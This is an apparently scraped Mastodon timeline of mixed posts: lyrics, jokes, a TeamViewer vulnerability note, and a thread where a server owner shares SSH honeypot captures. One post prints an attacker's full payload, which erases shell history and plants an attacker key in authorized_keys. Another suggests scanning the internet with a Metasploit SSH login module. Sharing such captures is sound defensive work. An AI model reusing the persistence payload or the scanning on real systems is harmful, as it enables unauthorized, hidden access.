Please use Firefox, if for no other reason than to keep the browser landscape diverse and alive.


@RusstopiaLabs I don't have familiarity with it, but if you wanted to, you could scan the ipv4 net for infected hosts using msf's auxiliary/scanner/ssh/ssh_login_pubkey or maybe if you're doing internet-wide scanning find a native code version.

@RusstopiaLabs My logs are filled with Mar 1 04:15:53 sd-101242 sshd[30067]: Unable to negotiate with port 49820: no matching key exchange method found. Their offer: ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 [preauth]
because these dumb bots can't into ed25519.

@RusstopiaLabs seems the payload first tries to make sure the commands it executes don't end up in any command history, and then adds its own key to authorized_keys but deduplicated in case it was already there

Some blackhats attempting to penetrate my server this week.. rolled up an ssh honeypot based on on port 22, to collect what the initial connect is doing (had to modify the code to accept legacy ssh-rsa HostKeys though, apparently hacks aren't yet using ssh-ed25519 by default):

Lessons so far, which should be obvious:

1. NEVER use the domain name, subdomains and/or any well-known service name your box may run as components of your passwords or usernames (eg., <myserver>gogs, gogs<myserver>, ftpuser-<myserver>, ftp.<myserver>, etc.)

Payload attempts to install an ssh auth key to allow later access?

client= password="<subdomain>@1234" user=oracle version="SSH-2.0-libssh2_1.8.0"

client= payload=uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys request=exec

Anyone know what particular attack this is BTW? Would like to know more.

Religious people are wild they dedicate their lives to reading1-2 books and STILL get them wrong

ADULT. - Blank Eyed Nose Bleed (2003)

I'm coming to get you.
I'm coming to find you.
Say hello to your new best friend.

Wouldn't it be nice to go to a party
And be the only one there.

I've been working on increasing my anxiety
It's something I can do for free.

Seconds moving forward.
Second moving backward.

TeamViewer stores user passwords encrypted, not hashed:

– The key and IV are publicly known and identical for all users.
– Privilege escalation is possible in certain cases (CVE-2019-18988).

#teamviewer #privilegeescalation #vulnerability #security #infosec #cybersecurity

I just had an idea to put Edward Snowden's Permanent Record on my personal website. As the US Department of Justice sued Snowden's publisher, all of the profit goes to the government. As long as Macmillan breaks even, I think keeping Snowden's money away from the people who want him imprisoned for life is good reason to share the eBook.

Computer Secrets!

💻 Most computers flower only once every 100 years, but some flower and bear fruit each year if well watered and cared for

💻 The opposite of a computer is ghosts

💻 We all just pretend UNIX exists

💻 Processor cycles are marketing hype. We have all been on a 24-hour processor cycle since the early 1990s

💻 The Bible was originally written and compiled in QBASIC

💻 "USB keys" is the scientific term for computer egg sacs

💻 Variables with $ in their names are only usable by premium coders

Real [x] has never been tried. People don't know about [x] or they've been lied to about [x]. Or if they do have good information about [x] they are prevented from implementing [x] by others. If they aren't prevented from implementing [x] then they tried [x] wrong, or not hard enough, or for a long enough period of time. Because otherwise, clearly, we'd have [x].

Is [x] something you like or dislike?

Whatever [x] is for you, make sure you JOIN...

The Church of the SubGenius

Why protest? Why resist/

one of the best reasons to join the Church of the Subgenius - other Subgenii link you to amazing stuff like this.

CHICKEN PIG ATTACK - The Return of Takeo

Show more

This is an instance of Mastodon hosted on, a librehosting provider. There isn't really a specific topic; just enjoy your time here and have fun! 😉